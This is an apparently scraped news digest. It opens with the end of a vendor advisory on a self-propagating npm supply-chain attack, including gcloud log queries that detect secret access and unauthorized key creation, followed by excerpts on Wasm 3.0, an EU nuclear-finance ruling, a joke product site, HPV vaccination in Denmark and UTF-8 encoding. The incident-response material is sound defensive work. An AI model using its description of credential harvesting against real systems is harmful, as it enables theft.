gcloud logging read 'resource.type="secretmanager.googleapis.com"' --limit=50 --format=json

# Check for unauthorized service account key creation

gcloud logging read 'protoPayload.methodName="google.iam.admin.v1.CreateServiceAccountKey"'

Also check deploy keys and repository secrets for all projects, and set up alerts for any new npm publishes from your organization.

The following steps are applicable only to StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14-day free trial by installing the StepSecurity GitHub App to complete the following recovery step.

The NPM Cooldown check automatically fails a pull request if it introduces an npm package version that was released within the organization's configured cooldown period (default: 2 days). Once the cooldown period has passed, the check clears automatically with no action required. The rationale is simple: most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
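The cooldown rule itself reduces to a date comparison. A minimal sketch of the idea in Python (illustrative only, not StepSecurity's implementation; the function name and parameters are assumptions):

```python
from datetime import datetime, timedelta, timezone

def passes_cooldown(released_at, cooldown_days=2, now=None):
    """Return True once a package version's release is older than the
    configured cooldown window (default: 2 days, as described above)."""
    now = now or datetime.now(timezone.utc)
    return now - released_at >= timedelta(days=cooldown_days)
```

A check built on this would fetch the version's publish timestamp from the registry metadata and fail the pull request while `passes_cooldown` is False.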

Here is an example showing how this check protected a project from using the compromised versions of packages involved in this incident.

We have added a new control specifically to detect pull requests that upgraded to these compromised packages. You can find the new control on the StepSecurity dashboard.

Use StepSecurity Harden-Runner to detect compromised dependencies in CI/CD

StepSecurity Harden-Runner adds runtime security monitoring to your GitHub Actions workflows, providing visibility into network calls, file system changes, and process executions during CI/CD runs. Harden-Runner detects the compromised packages when they are used in CI/CD. Here is a sample Harden-Runner insights page demonstrating this detection.

If you're already using Harden-Runner, we strongly recommend you review recent anomaly detections in your Harden-Runner dashboard. You can get started with Harden-Runner by following the guide at https://docs.stepsecurity.io/harden-runner.

The StepSecurity Threat Center provides comprehensive details about this @ctrl/tinycolor compromise and all 40+ affected packages. Access the Threat Center through your dashboard to view IOCs, remediation guidance, and real-time updates as new compromised packages are discovered. Threat alerts are automatically delivered to your SIEM via AWS S3 and webhook integrations, enabling immediate incident response when supply chain attacks occur. Our detection systems identified this attack within minutes of publication, providing early warning before widespread exploitation.

Use StepSecurity Artifact Monitor to detect software releases outside of authorized pipelines

StepSecurity Artifact Monitor provides real-time detection of unauthorized package releases by continuously monitoring your artifacts across package registries. This tool would have flagged this incident by detecting that the compromised versions were published outside of the project's authorized CI/CD pipeline. The monitor tracks release patterns, verifies provenance, and alerts teams when packages are published through unusual channels or from unexpected locations. By implementing Artifact Monitor, organizations can catch supply chain compromises within minutes rather than hours or days, significantly reducing the window of exposure to malicious packages.

Learn more about implementing Artifact Monitor in your security workflow at https://docs.stepsecurity.io/artifact-monitor.

Thanks to the npm security team and package maintainers for their swift response to this incident, and to @franky47, who promptly notified the community through a GitHub issue. The collaborative efforts of security researchers, maintainers, and community members continue to be essential in defending against supply chain attacks.

The popular @ctrl/tinycolor package, with over 2 million weekly downloads, has been compromised alongside 40+ other NPM packages in a sophisticated supply chain attack dubbed "Shai-Hulud". The malware self-propagates across maintainer packages, harvests AWS/GCP/Azure credentials using TruffleHog, and establishes persistence through GitHub Actions backdoors, representing a major escalation in NPM ecosystem threats.

StepSecurity's Harden-Runner protects 8,000+ repositories with EDR-style runtime monitoring for CI/CD pipelines, stopping supply chain attacks and securing GitHub Actions.

Learn how to secure Google Gemini in GitHub Actions with Harden-Runner, combining observability with runtime monitoring for CI/CD security.

...

Read the original on www.stepsecurity.io »

6 1,020 shares, 38 trendiness

Wasm 3.0 Completed

Three years ago, ver­sion 2.0 of the Wasm stan­dard was (essentially) fin­ished, which brought a num­ber of new fea­tures, such as vec­tor in­struc­tions, bulk mem­ory op­er­a­tions, mul­ti­ple re­turn val­ues, and sim­ple ref­er­ence types.

In the meantime, the Wasm W3C Community Group and Working Group have not been lazy. Today, we are happy to announce the release of Wasm 3.0 as the new "live" standard.

This is a sub­stan­tially larger up­date: sev­eral big fea­tures, some of which have been in the mak­ing for six or eight years, fi­nally made it over the fin­ish­ing line.

64-bit ad­dress space. Memories and ta­bles can now be de­clared to use i64 as their ad­dress type in­stead of just i32. That ex­pands the avail­able ad­dress space of Wasm ap­pli­ca­tions from 4 gi­ga­bytes to (theoretically) 16 ex­abytes, to the ex­tent that phys­i­cal hard­ware al­lows. While the web will nec­es­sar­ily keep en­forc­ing cer­tain lim­its — on the web, a 64-bit mem­ory is lim­ited to 16 gi­ga­bytes — the new flex­i­bil­ity is es­pe­cially in­ter­est­ing for non-web ecosys­tems us­ing Wasm, as they can sup­port much, much larger ap­pli­ca­tions and data sets now.

Multiple memories. Contrary to popular belief, Wasm applications were always able to use multiple memory objects, and hence multiple address spaces, simultaneously. However, previously that was only possible by declaring and accessing each of them in separate modules. This gap has been closed: a single module can now declare (define or import) multiple memories and directly access them, including directly copying data between them. This finally allows tools like wasm-merge, which perform "static linking" on two or more Wasm modules by merging them into one, to work for all Wasm modules. It also paves the way for new uses of separate address spaces, e.g., for security (separating private data), for buffering, or for instrumentation.

Garbage col­lec­tion. In ad­di­tion to ex­pand­ing the ca­pa­bil­i­ties of raw lin­ear mem­o­ries, Wasm also adds sup­port for a new (and sep­a­rate) form of stor­age that is au­to­mat­i­cally man­aged by the Wasm run­time via a garbage col­lec­tor. Staying true to the spirit of Wasm as a low-level lan­guage, Wasm GC is low-level as well: a com­piler tar­get­ing Wasm can de­clare the mem­ory lay­out of its run­time data struc­tures in terms of struct and ar­ray types, plus un­boxed tagged in­te­gers, whose al­lo­ca­tion and life­time is then han­dled by Wasm. But that’s it. Everything else, such as en­gi­neer­ing suit­able rep­re­sen­ta­tions for source-lan­guage val­ues, in­clud­ing im­ple­men­ta­tion de­tails like method ta­bles, re­mains the re­spon­si­bil­ity of com­pil­ers tar­get­ing Wasm. There are no built-in ob­ject sys­tems, nor clo­sures or other higher-level con­structs — which would in­evitably be heav­ily bi­ased to­wards spe­cific lan­guages. Instead, Wasm only pro­vides the ba­sic build­ing blocks for rep­re­sent­ing such con­structs and fo­cuses purely on the mem­ory man­age­ment as­pect.

Typed ref­er­ences. The GC ex­ten­sion is built upon a sub­stan­tial ex­ten­sion to the Wasm type sys­tem, which now sup­ports much richer forms of ref­er­ences. Reference types can now de­scribe the ex­act shape of the ref­er­enced heap value, avoid­ing ad­di­tional run­time checks that would oth­er­wise be needed to en­sure safety. This more ex­pres­sive typ­ing mech­a­nism, in­clud­ing sub­typ­ing and type re­cur­sion, is also avail­able for func­tion ref­er­ences, mak­ing it pos­si­ble to per­form safe in­di­rect func­tion calls with­out any run­time type or bounds check, through the new cal­l_ref in­struc­tion.

Tail calls. Tail calls are a vari­ant of func­tion calls that im­me­di­ately exit the cur­rent func­tion, and thereby avoid tak­ing up ad­di­tional stack space. Tail calls are an im­por­tant mech­a­nism that is used in var­i­ous lan­guage im­ple­men­ta­tions both in user-vis­i­ble ways (e.g., in func­tional lan­guages) and for in­ter­nal tech­niques (e.g., to im­ple­ment stubs). Wasm tail calls are fully gen­eral and work for callees both se­lected sta­t­i­cally (by func­tion in­dex) and dy­nam­i­cally (by ref­er­ence or table).

Exception han­dling. Exceptions pro­vide a way to lo­cally abort ex­e­cu­tion, and are a com­mon fea­ture in mod­ern pro­gram­ming lan­guages. Previously, there was no ef­fi­cient way to com­pile ex­cep­tion han­dling to Wasm, and ex­ist­ing com­pil­ers typ­i­cally re­sorted to con­vo­luted ways of im­ple­ment­ing them by es­cap­ing to the host lan­guage, e.g., JavaScript. This was nei­ther portable nor ef­fi­cient. Wasm 3.0 hence pro­vides na­tive ex­cep­tion han­dling within Wasm. Exceptions are de­fined by de­clar­ing ex­cep­tion tags with as­so­ci­ated pay­load data. As one would ex­pect, an ex­cep­tion can be thrown, and se­lec­tively be caught by a sur­round­ing han­dler, based on its tag. Exception han­dlers are a new form of block in­struc­tion that in­cludes a dis­patch list of tag/​la­bel pairs or catch-all la­bels to de­fine where to jump when an ex­cep­tion oc­curs.

Relaxed vector instructions. Wasm 2.0 added a large set of vector (SIMD) instructions, but due to differences in hardware, some of these instructions have to do extra work on some platforms to achieve the specified semantics. In order to squeeze out maximum performance, Wasm 3.0 introduces "relaxed" variants of these instructions that are allowed to have implementation-dependent behavior in certain edge cases. This behavior must be selected from a pre-specified set of legal choices.

Deterministic pro­file. To make up for the added se­man­tic fuzzi­ness of re­laxed vec­tor in­struc­tions, and in or­der to sup­port set­tings that de­mand or need de­ter­min­is­tic ex­e­cu­tion se­man­tics (such as blockchains, or re­playable sys­tems), the Wasm stan­dard now spec­i­fies a de­ter­min­is­tic de­fault be­hav­ior for every in­struc­tion with oth­er­wise non-de­ter­min­is­tic re­sults — cur­rently, this in­cludes float­ing-point op­er­a­tors and their gen­er­ated NaN val­ues and the afore­men­tioned re­laxed vec­tor in­struc­tions. Between plat­forms choos­ing to im­ple­ment this de­ter­min­is­tic ex­e­cu­tion pro­file, Wasm thereby is fully de­ter­min­is­tic, re­pro­ducible, and portable.

Custom an­no­ta­tion syn­tax. Finally, the Wasm text for­mat has been en­riched with generic syn­tax for plac­ing an­no­ta­tions in Wasm source code. Analogous to cus­tom sec­tions in the bi­nary for­mat, these an­no­ta­tions are not as­signed any mean­ing by the Wasm stan­dard it­self, and can be cho­sen to be ig­nored by im­ple­men­ta­tions. However, they pro­vide a way to rep­re­sent the in­for­ma­tion stored in cus­tom sec­tions in hu­man-read­able and writable form, and con­crete an­no­ta­tions can be spec­i­fied by down­stream stan­dards.

In ad­di­tion to these core fea­tures, em­bed­dings of Wasm into JavaScript ben­e­fit from a new ex­ten­sion to the JS API:

JS string builtins. JavaScript string val­ues can al­ready be passed to Wasm as ex­tern­refs. Functions from this new prim­i­tive li­brary can be im­ported into a Wasm mod­ule to di­rectly ac­cess and ma­nip­u­late such ex­ter­nal string val­ues in­side Wasm.

With these new fea­tures, Wasm has much bet­ter sup­port for com­pil­ing high-level pro­gram­ming lan­guages. Enabled by this, we have seen var­i­ous new lan­guages pop­ping up to tar­get Wasm, such as Java, OCaml, Scala, Kotlin, Scheme, or Dart, all of which use the new GC fea­ture.

On top of all these good­ies, Wasm 3.0 also is the first ver­sion of the stan­dard that has been pro­duced with the new SpecTec tool chain. We be­lieve that this makes for an even more re­li­able spec­i­fi­ca­tion.

Wasm 3.0 is al­ready ship­ping in most ma­jor web browsers, and sup­port in stand-alone en­gines like Wasmtime is on track to com­ple­tion as well. The Wasm fea­ture sta­tus page tracks sup­port across en­gines.

...

Read the original on webassembly.org »

7 956 shares, 33 trendiness

EU Court Rules Nuclear Energy is Clean Energy

with my fel­low youth cli­mate ac­tivists along­side WePlanet two years ago, I had no idea just how quickly the anti-nu­clear domi­noes would fall across Europe.

In 2023, and what seems like a life­time ago, Austria launched their le­gal ac­tion against the European Commission for the in­clu­sion of nu­clear en­ergy in the EU Sustainable Finance Taxonomy. At the time they were sup­ported by a bul­wark of EU coun­tries and en­vi­ron­men­tal NGOs that op­posed nu­clear en­ergy. Honestly, it looked like they might win.

Germany, long a sym­bol of anti-nu­clear pol­i­tics, is be­gin­ning to shift. The nu­clear phase-outs or bans in the Netherlands, Belgium, Switzerland, Denmark, and Italy are now his­tory. Even Fridays for Future has qui­etened its op­po­si­tion, and in some places, em­braced nu­clear power.

It shows what’s pos­si­ble when we stick to the sci­ence. The ev­i­dence only gets clearer by the day that nu­clear en­ergy has an ex­tremely low en­vi­ron­men­tal im­pact across its life­cy­cle, and strong reg­u­la­tions and safety cul­ture en­sure that it re­mains one of the safest forms of en­ergy avail­able to hu­man­ity.

The European Court of Justice has now fully dis­missed Austria’s law­suit. That rul­ing does­n’t just up­hold nu­clear en­er­gy’s place in EU green fi­nance rules. It also sig­nals a near-cer­tain de­feat for the on­go­ing Greenpeace case — the very law­suit that in­spired me to launch Dear Greenpeace in the first place.

But instead of learning from this, Greenpeace is doubling down. Martin Kaiser, Executive Director of Greenpeace Germany, called the court decision "a dark day for the climate".

Let that sink in. The high­est court in the EU just reaf­firmed that nu­clear en­ergy meets the sci­en­tific and en­vi­ron­men­tal stan­dards to be in­cluded in sus­tain­able fi­nance, and Greenpeace still re­fuses to budge.

Meanwhile, the cli­mate cri­sis gets worse. Global emis­sions are not falling fast enough. Billions of peo­ple still lack ac­cess to clean, re­li­able elec­tric­ity. And we are forced to spend time de­fend­ing proven so­lu­tions in­stead of scal­ing them.

It’s now up to the court whether we will get our time in court to out­line the ev­i­dence in sup­port of nu­clear en­ergy and the im­por­tant role it can play in the global clean en­ergy tran­si­tion. Whether in court, on the streets, or in the halls of par­lia­ments across the globe, we will be there to de­fend the sci­ence and en­sure that nu­clear power can spread the ad­van­tages of the mod­ern world across the planet in a sus­tain­able, re­li­able and dig­ni­fied way.

Austria stands in­creas­ingly iso­lated among a hand­ful of coun­tries that still cling to their op­po­si­tion to nu­clear en­ergy. Their de­feat in this vi­tal high stakes topic is a suc­cess not just for the nu­clear move­ment, but for the global tran­si­tion as a whole.

We have made real progress. Together, we’ve helped de­fend nu­clear power in the EU, over­turned out­dated poli­cies at the World Bank, and se­cured more tech­nol­ogy-neu­tral lan­guage at the UN. These wins are not ab­stract. They open the door to real in­vest­ment, real pro­jects, and real emis­sions cuts.

This is a great suc­cess for the move­ment and it would not have been pos­si­ble with­out the fi­nan­cial sup­port, time and en­ergy given by peo­ple like you.

...

Read the original on www.weplanet.org »

8 930 shares, 40 trendiness

Anycrap 🛒 The Store of Infinite Products

We'll find it somewhere across parallel dimensions, just tell us what you want. Find It Now

What people are saying:

- "This made me LoL so many times. It is the best thing to come from AI"
- "This is the complete opposite of AI Slop: A website that turns absurd queries into unbelievable products, all for the lulz"
- "This is a hilarious take on generative AI: 😂 an infinite marketplace of any impossibly absurd product you can dream up. Ridiculous, but awesome. And, a domain that fits"
- "It's literally an online store that sells… nothing. Well, it sells concepts of products that don't exist. And it's more than brilliant!"
- "It's just like the real ones, except you don't have to deal with disappointment or the returns process. Many things in it could and should be real objects"
- "A web service that uses generative AI to fulfill the desire for 'I want this kind of product!'"
- "The internet is back! I haven't felt such a thrilling sense of high-effort whimsical pointlessness since the early 2000s"
- "I asked for invisible cheese burger, it was very visible, very terrible service, 10/10 would use again"

All our products are unique concepts developed specifically for our customers. Our product concepts are delivered instantly to your device! Experience a new way of shopping where imagination drives innovation. Be the first to discover it! Give us a name and we'll find it somewhere. Invent Now

You really want emails about fictional products every week? Well, okay then…

© 2025 anycrap.shop — tomorrow's products, available today (not actually available)

...

Read the original on anycrap.shop »

9 911 shares, 37 trendiness

Denmark close to wiping out leading cancer-causing HPV strains after vaccine roll-out

Denmark has ef­fec­tively elim­i­nated in­fec­tions with the two biggest can­cer-caus­ing strains of hu­man pa­pil­lo­mavirus (HPV) since the vac­cine was in­tro­duced in 2008, data sug­gests.

The re­search, pub­lished in Eurosurveillance, could have im­pli­ca­tions for how vac­ci­nated pop­u­la­tions are screened in the com­ing years — par­tic­u­larly as peo­ple in­creas­ingly re­ceive vac­cines that pro­tect against mul­ti­ple high-risk types of HPV virus.

After breast can­cer, cer­vi­cal can­cer is the most com­mon type of can­cer among women aged 15 to 44 years in Europe, and hu­man pa­pil­lo­mavirus (HPV) is the lead­ing cause.

At least 14 high-risk types of the virus have been iden­ti­fied, and be­fore Denmark in­tro­duced the HPV vac­cine in 2008, HPV types 16 and 18 ac­counted for around three quar­ters (74%) of cer­vi­cal can­cers in the coun­try.

Initially, girls were of­fered a vac­cine that pro­tected against four types of HPV: 16, 18, plus the lower risk types 6 and 11. However, since 2017, Danish girls have been of­fered a vac­cine that pro­tects against nine types of HPV — in­clud­ing those ac­count­ing for ap­prox­i­mately 90% of cer­vi­cal can­cers.

To bet­ter un­der­stand the im­pact that these vac­ci­na­tion pro­grammes have had on HPV preva­lence as vac­ci­nated girls reach cer­vi­cal screen­ing age (23 to 64 years in Denmark), Dr Mette Hartmann Nonboe at Zealand University Hospital in Nykøbing Falster and col­leagues analysed up to three con­sec­u­tive cer­vi­cal cell sam­ples col­lected from Danish women be­tween 2017 and 2024, when they were 22 to 30 years of age.

"In 2017, one of the first birth cohorts of women in Denmark who were HPV-vaccinated as teenage girls in 2008 reached the screening age of 23 years," Nonboe explained.

"Compared with previous generations, these women are expected to have a considerably lower risk of cervical cancer, and it is pertinent to assess [their] future need for screening."

The re­search found that in­fec­tion with the high-risk HPV types (HPV16/18) cov­ered by the vac­cine has been al­most elim­i­nated.

"Before vaccination, the prevalence of HPV16/18 was between 15 and 17%, which has decreased in vaccinated women to less than one percent by 2021," the researchers said.

In addition, the prevalence of HPV types 16 and 18 in women who had not been vaccinated against HPV was five percent. This strongly suggests that the vaccine has reduced the circulation of these HPV types in the general population, to the extent that even unvaccinated women are now less likely to be infected with them, so-called "population immunity", the researchers said.

Despite this good news, roughly one third of women screened dur­ing the study pe­riod still had in­fec­tion with high-risk HPV types not cov­ered by the orig­i­nal vac­cines — and new in­fec­tions with these types were more fre­quent among vac­ci­nated women, com­pared to un­vac­ci­nated ones.

This is expected to fall once girls who received the more recent 'nine-valent' vaccine reach screening age. At this point, the screening guidelines should potentially be reconsidered, Nonboe and colleagues said.

...

Read the original on www.gavi.org »

10 728 shares, 29 trendiness

UTF-8 is a Brilliant Design — Vishnu's Pages

The first time I learned about UTF-8 en­cod­ing, I was fas­ci­nated by how well-thought and bril­liantly it was de­signed to rep­re­sent mil­lions of char­ac­ters from dif­fer­ent lan­guages and scripts, and still be back­ward com­pat­i­ble with ASCII.

Basically, UTF-8 uses up to 32 bits (four bytes) per character while the old ASCII uses 7 bits, but UTF-8 is designed in such a way that:

* Every UTF-8 en­coded file that has only ASCII char­ac­ters is a valid ASCII file.

Designing a sys­tem that scales to mil­lions of char­ac­ters and still be com­pat­i­ble with the old sys­tems that use just 128 char­ac­ters is a bril­liant de­sign.

Note: If you are al­ready aware of the UTF-8 en­cod­ing, you can ex­plore the UTF-8 Playground util­ity that I built to vi­su­al­ize UTF-8 en­cod­ing.

UTF-8 is a vari­able-width char­ac­ter en­cod­ing de­signed to rep­re­sent every char­ac­ter in the Unicode char­ac­ter set, en­com­pass­ing char­ac­ters from most of the world’s writ­ing sys­tems.

It en­codes char­ac­ters us­ing one to four bytes.

The first 128 char­ac­ters (U+0000 to U+007F) are en­coded with a sin­gle byte, en­sur­ing back­ward com­pat­i­bil­ity with ASCII, and this is the rea­son why a file with only ASCII char­ac­ters is a valid UTF-8 file.

Other characters require two, three, or four bytes. The leading bits of the first byte determine the total number of bytes that represent the current character. These bits follow one of four specific patterns, which indicate how many continuation bytes follow:

0xxxxxxx (1 byte, ASCII)
110xxxxx 10xxxxxx (2 bytes)
1110xxxx 10xxxxxx 10xxxxxx (3 bytes)
11110xxx 10xxxxxx 10xxxxxx 10xxxxxx (4 bytes)

Notice that the sec­ond, third, and fourth bytes in a multi-byte se­quence al­ways start with 10. This in­di­cates that these bytes are con­tin­u­a­tion bytes, fol­low­ing the main byte.

The remaining bits in the main byte, along with the bits in the continuation bytes, are combined to form the character's code point. A code point serves as a unique identifier for a character in the Unicode character set. A code point is typically represented in hexadecimal format, prefixed with "U+". For example, the code point for the character "A" is U+0041.

So here is how a soft­ware de­ter­mines the char­ac­ter from the UTF-8 en­coded bytes:

Read a byte. If it starts with 0, it’s a sin­gle-byte char­ac­ter (ASCII). Show the char­ac­ter rep­re­sented by the re­main­ing 7 bits on the screen. Continue with the next byte.

If the byte did­n’t start with a 0, then:

If it starts with 110, it’s a two-byte char­ac­ter, so read the next byte as well.

If it starts with 1110, it’s a three-byte char­ac­ter, so read the next two bytes.

If it starts with 11110, it’s a four-byte char­ac­ter, so read the next three bytes.

Once the num­ber of bytes are de­ter­mined, read all the re­main­ing bits ex­cept the lead­ing bits, and find the bi­nary value (aka. code point) of the char­ac­ter.

Look up the code point in the Unicode char­ac­ter set to find the cor­re­spond­ing char­ac­ter and dis­play it on the screen.

Read the next byte and re­peat the process.
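The steps above can be sketched as a small Python decoder. This is illustrative only: it follows exactly the leading-bit rules just described, without the extra validation a production decoder needs (e.g. rejecting overlong encodings and surrogate code points):

```python
def decode_utf8(data):
    """Decode UTF-8 bytes into a list of Unicode code points,
    following the leading-bit rules described above."""
    code_points = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:              # 0xxxxxxx: single-byte character (ASCII)
            cp, extra = b, 0
        elif b >> 5 == 0b110:     # 110xxxxx: two-byte character
            cp, extra = b & 0x1F, 1
        elif b >> 4 == 0b1110:    # 1110xxxx: three-byte character
            cp, extra = b & 0x0F, 2
        elif b >> 3 == 0b11110:   # 11110xxx: four-byte character
            cp, extra = b & 0x07, 3
        else:
            raise ValueError(f"invalid leading byte at offset {i}")
        if i + extra >= len(data):
            raise ValueError("truncated multi-byte sequence")
        for b2 in data[i + 1 : i + 1 + extra]:
            if b2 >> 6 != 0b10:   # continuation bytes must start with 10
                raise ValueError("invalid continuation byte")
            cp = (cp << 6) | (b2 & 0x3F)
        code_points.append(cp)
        i += 1 + extra
    return code_points
```

For example, `decode_utf8(b"\xe0\xa4\x85")` yields `[0x0905]`, the code point worked through in the next section.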

The Hindi letter "अ" (officially "Devanagari Letter A") is represented in UTF-8 as:

The first byte 11100000 in­di­cates that the char­ac­ter is en­coded us­ing 3 bytes.

The re­main­ing bits of the three bytes:

xxxx0000 xx100100 xx000101 are com­bined to form the bi­nary se­quence 00001001 00000101 (0x0905 in hexa­dec­i­mal). This is the code point of the char­ac­ter, rep­re­sented as U+0905.

The code point U+0905 (see official chart) represents the Hindi letter "अ" in the Unicode character set.
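You can verify this worked example with Python's built-in codecs:

```python
s = "अ"
b = s.encode("utf-8")

# The three encoded bytes, in hex and binary
print(b.hex())                            # e0a485
print(" ".join(f"{x:08b}" for x in b))    # 11100000 10100100 10000101

# The code point recovered from the character
print(f"U+{ord(s):04X}")                  # U+0905
```

The binary output shows the 1110 leading pattern on the first byte and the 10 prefix on both continuation bytes, exactly as described above.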

Now that we un­der­stood the de­sign of UTF-8, let’s look at a file that con­tains the fol­low­ing text:

The text Hey👋 Buddy has both English char­ac­ters and an emoji char­ac­ter on it. The text file with this text saved on the disk will have the fol­low­ing 13 bytes in it:

Let’s eval­u­ate this file byte-by-byte fol­low­ing the UTF-8 de­cod­ing rules:

Now this is a valid UTF-8 file, but it doesn't have to be "backward compatible" with ASCII because it contains a non-ASCII character (the emoji). Next let's create a file that contains only ASCII characters.

The text file does­n’t have any non-ASCII char­ac­ters. The file saved on the disk has the fol­low­ing 9 bytes in it:

Let’s eval­u­ate this file byte-by-byte fol­low­ing the UTF-8 de­cod­ing rules:

So this is a valid UTF-8 file, and it is also a valid ASCII file. The bytes in this file follow both the UTF-8 and ASCII encoding rules. This is how UTF-8 is designed to be backward compatible with ASCII.

I did some quick research on other encodings that are backward compatible with ASCII, and there are a few, but none as popular as UTF-8: for example GB 18030 (a Chinese government standard). Another is the ISO/IEC 8859 family, single-byte encodings that extend ASCII with additional characters but are limited to 256 characters.

The sib­lings of UTF-8, like UTF-16 and UTF-32, are not back­ward com­pat­i­ble with ASCII. For ex­am­ple, the let­ter A’ in UTF-16 is rep­re­sented as: 00 41 (two bytes), while in UTF-32 it is rep­re­sented as: 00 00 00 41 (four bytes).
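A quick check of the three encodings in Python makes the difference concrete:

```python
# UTF-8 encodes ASCII characters as themselves; UTF-16/32 do not.
print("A".encode("utf-8"))      # b'A'              -> identical to ASCII
print("A".encode("utf-16-be"))  # b'\x00A'          -> two bytes
print("A".encode("utf-32-be"))  # b'\x00\x00\x00A'  -> four bytes
```

The big-endian variants are used here to avoid the byte-order mark that plain "utf-16"/"utf-32" would prepend.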

When I was exploring UTF-8 encoding, I couldn't find any good tool to interactively visualize how it works. So I built UTF-8 Playground to visualize and play around with UTF-8 encoding. Give it a try!

Read an ocean of knowledge and references that extend this post on Hacker News.

You can also find discussions on OSnews, lobste.rs, and Hackaday.

Joel Spolsky’s fa­mous 2003 ar­ti­cle (still rel­e­vant): The Absolute Minimum Every Software Developer Absolutely, Positively Must Know About Unicode and Character Sets (No Excuses!)

"UTF-8 was designed, in front of my eyes, on a placemat in a New Jersey diner one night in September or so 1992." - Rob Pike on designing UTF-8 with Ken Thompson

An ex­cel­lent ex­plainer by Russ Cox: UTF-8: Bits, Bytes, and Benefits

...

Read the original on iamvishnu.com »
